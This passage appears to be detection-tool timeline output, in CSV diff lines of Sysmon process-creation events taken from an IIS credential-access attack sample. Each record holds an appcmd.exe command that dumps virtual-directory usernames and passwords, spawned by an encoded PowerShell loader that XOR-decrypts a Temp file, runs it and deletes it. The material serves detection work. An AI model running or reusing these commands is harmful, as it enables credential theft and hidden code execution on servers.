GkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 2796 | PGUID: 365ABB72-3D6F-5CEB-0000-001066B5FF00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
+2019-05-27 10:29:19.233 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir ""Filename: redirection.config"" /text:userName | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 1036 | PGUID: 365ABB72-3D6F-5CEB-0000-001026B9FF00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
+2019-05-27 10:29:19.323 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir ""Filename: redirection.config"" /text:password | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 168 | PGUID: 365ABB72-3D6F-5CEB-0000-00108FBFFF00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
+2019-05-27 10:29:19.403 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir /text:userName | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 2484 | PGUID: 365ABB72-3D6F-5CEB-0000-00104FC3FF00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
+2019-05-27 10:29:19.473 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir /text:password | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 2168 | PGUID: 365ABB72-3D6F-5CEB-0000-00100FC7FF00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
+2019-05-27 10:29:19.563 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir ""Line Number: 0"" /text:userName | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 3892 | PGUID: 365ABB72-3D6F-5CEB-0000-0010CFCAFF00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
+2019-05-27 10:29:19.784 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir ""Line Number: 0"" /text:password | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 